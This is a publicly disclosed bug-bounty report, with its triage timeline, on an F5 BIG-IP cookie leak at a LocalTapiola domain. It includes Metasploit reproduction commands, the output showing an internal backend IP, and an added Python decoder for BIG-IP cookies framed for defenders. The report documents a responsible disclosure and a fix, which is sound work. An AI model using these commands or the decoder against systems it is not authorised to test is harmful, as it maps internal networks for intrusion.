F5 BigIP Backend Cookie Disclosure
State Resolved (Closed)
Disclosed publicly 2018-09-10T01:21:20.723Z
Reported To
Weakness Information Disclosure
Bounty $50

Summary by lovepakistan

Issue

The reporter found that the f5 Big-IP cookies potentially reveal BigIP pool name, backend's IP address and port, routed domain.

Fix

There is an option in Big-IP to fix this. Just click, apply and you are done.

Reasoning

The issue is not critical, but it was an easy fix. Note: we will apply this to all domains, and no further reports on this for other domains will ever be accepted.

Timeline
submitted a report to LocalTapiola .
2018-07-21T09:42:24.281Z

Basic report information

Summary:
The same issue was reported on www.myynti.lahitapiolarahoitus.fi by another reporter, and it was fixed there. But when I tested the same issue on lahitapiolarahoitus.fi, it was also leaking information.

Description:
I identified F5 BigIP load balancers that leak backend information (pool name, backend's IP address and port, routed domain) through cookies inserted by the BigIP system.

Browsers / Apps Verified In:

  • MetaSploit Framework

Steps To Reproduce:

MetaSploit commands:

  1. use auxiliary/gather/f5_bigip_cookie_disclosure
  2. SET RHOST lahitapiolarahoitus.fi
  3. run

OUTPUT:
[*] Starting request /
[+] F5 BigIP load balancing cookie "BIGipServerltr-prod_pool = 224700608.20480.0000" found
[+] Load balancing pool name "ltr-prod_pool" found
[+] Backend 192.168.100.13:80 found
[*] Auxiliary module execution completed

Additional material

Related Report: #330716
Refer to Cap2.JPG (F322966) as it is Fixed.

References:

https://www.rapid7.com/db/modules/auxiliary/gather/f5_bigip_cookie_disclosure
https://support.f5.com/csp/article/K14784%3Fsr%3D45997495
http://www.systemadvise.com/2016/11/f5-big-ip-cookie-remote-information.html

Impact

An attacker can obtain back-end information (pool name, backend's IP address and port, routed domain) through cookies inserted by the BigIP system.

Regards,
Frans
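The cookie encoding behind the Metasploit output above, as an added decoder that is not part of the original report or of the Metasploit module: it turns an unencrypted BIG-IP persistence cookie into pool name, backend IP and port, so a defender can re-check their own Set-Cookie headers after enabling cookie encryption. The plain form is the one in the report; the route-domain form follows F5's documented "rd<n>o...o<port>" encoding; the sample header lines are constructed.

```python
import ipaddress
import re
import struct
from typing import List, NamedTuple, Optional

# Constructed Set-Cookie lines: the first mirrors the value in the report, the second
# is a made-up route-domain variant, the third is an unrelated cookie that must be ignored.
SAMPLE_HEADERS = [
    "Set-Cookie: BIGipServerltr-prod_pool=224700608.20480.0000; path=/",
    "Set-Cookie: BIGipServerweb_pool=rd5o00000000000000000000ffffc0a8640do8080; path=/",
    "Set-Cookie: SESSIONID=abc123; path=/; HttpOnly",
]

class BigIpBackend(NamedTuple):
    pool: str
    ip: str
    port: int
    route_domain: Optional[int]

_COOKIE_RE = re.compile(r"BIGipServer(?P<pool>[^=;\s]+)=(?P<value>[^;\s]+)")
_PLAIN_RE = re.compile(r"^(?P<ip>\d+)\.(?P<port>\d+)\.0000$")
_RD_RE = re.compile(r"^rd(?P<rd>\d+)o0{20}ffff(?P<ip>[0-9a-f]{8})o(?P<port>\d+)$", re.I)

def decode_bigip_cookie(header: str) -> Optional[BigIpBackend]:
    """Decode an unencrypted BIG-IP persistence cookie; None if absent or in an unknown form."""
    m = _COOKIE_RE.search(header)
    if not m:
        return None
    pool, value = m["pool"], m["value"]
    p = _PLAIN_RE.match(value)
    if p and int(p["port"]) <= 0xFFFF and int(p["ip"]) <= 0xFFFFFFFF:
        # IPv4 address and port are stored as little-endian integers written in decimal.
        ip = str(ipaddress.IPv4Address(struct.pack("<I", int(p["ip"]))))
        port = struct.unpack("<H", struct.pack(">H", int(p["port"])))[0]
        return BigIpBackend(pool, ip, port, None)
    r = _RD_RE.match(value)
    if r and int(r["port"]) <= 0xFFFF:
        # Route-domain form carries the IPv4-mapped IPv6 address in hex and the port in plain decimal.
        ip = str(ipaddress.IPv4Address(bytes.fromhex(r["ip"])))
        return BigIpBackend(pool, ip, int(r["port"]), int(r["rd"]))
    return None

def find_leaked_backends(headers: List[str]) -> List[BigIpBackend]:
    """Decodable BIG-IP cookies pointing at private (RFC 1918) backends; empty once encryption is on."""
    leaks = []
    for h in headers:
        backend = decode_bigip_cookie(h)
        if backend and ipaddress.ip_address(backend.ip).is_private:
            leaks.append(backend)
    return leaks
```

Run it against the headers a curl -i against your own virtual server returns; any entry in the result means the persistence cookie is still going out in the clear.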

localtapiola-thomas Activities::Comment
2018-07-21T10:12:11.071Z
Thanks a lot for reporting this potential issue back to us. LocalTapiola takes security very seriously and would appreciate if you would not share any information about this report until we have determined whether this is a bug and what any potential impact (or fix) will be. Our security team will take a look at this issue as soon as possible. We aim to respond to your report as soon as possible, but due to the complexity of the systems, triaging many times can take a long time. We prioritize issues - reports containing trivial issues with limited (or no) business impact and badly written reports with insufficient information on how to reproduce the issue receive a lower priority. Please do not request updates for at least 20 days into the process. Once triaged and verified, bounty decisions are made 1-2 times per month. *Note: if we frequently dismiss your reports, make sure you have read our policy and stay in scope and that you know how to write good reports - https://support.hackerone.com/hc/en-us/articles/211538803-Step-by-Step-How-to-write-a-good-vulnerability-report and http://blog.bugcrowd.com/advice-for-writing-a-great-vulnerability-report/. Also, our policy contains a lot of information on what is relevant and what is not.*


Activities::BountyAwarded
2018-07-21T10:12:41.074Z


lovepakistan Activities::Comment
2018-08-24T09:47:01.627Z
Please do have a look !


lovepakistan Activities::Comment
2018-09-05T19:38:55.569Z
Any Updates?


localtapiola-thomas Activities::Comment
2018-09-05T23:26:28.366Z
You can retest to verify the fix.


lovepakistan Activities::Comment
2018-09-09T08:10:04.731Z
I am not able to reproduce it. Thanks! F344000


localtapiola-thomas Activities::BugResolved
2018-09-09T22:02:08.609Z
Closing as resolved.


localtapiola-thomas Activities::AgreedOnGoingPublic
2018-09-09T22:02:25.326Z
Full disclosure.


lovepakistan Activities::AgreedOnGoingPublic
2018-09-10T01:21:20.673Z


lovepakistan Activities::ReportBecamePublic
2018-09-10T01:21:20.754Z